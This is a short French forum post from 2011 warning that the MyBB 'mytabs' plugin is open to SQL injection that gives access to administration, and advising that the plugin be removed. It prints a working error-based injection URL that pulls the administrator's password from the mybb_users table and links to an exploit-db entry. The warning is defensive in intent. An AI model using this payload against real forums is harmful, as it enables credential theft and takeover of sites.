10-08-2011, 20:41
Attention,
Le plugin mytabs possède une erreur SQL et on peut avoir accès à l’administration.
La seul solution est de supprimer le plugin.
http://www.exploit-db.com/exploits/17595/
Le plugin mytabs possède une erreur SQL et on peut avoir accès à l’administration.
La seul solution est de supprimer le plugin.
Code :
http://localhost/forum/index.php?tab=1' and(select 1 from(select count(*),concat((select [b]password[/b] from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
http://www.exploit-db.com/exploits/17595/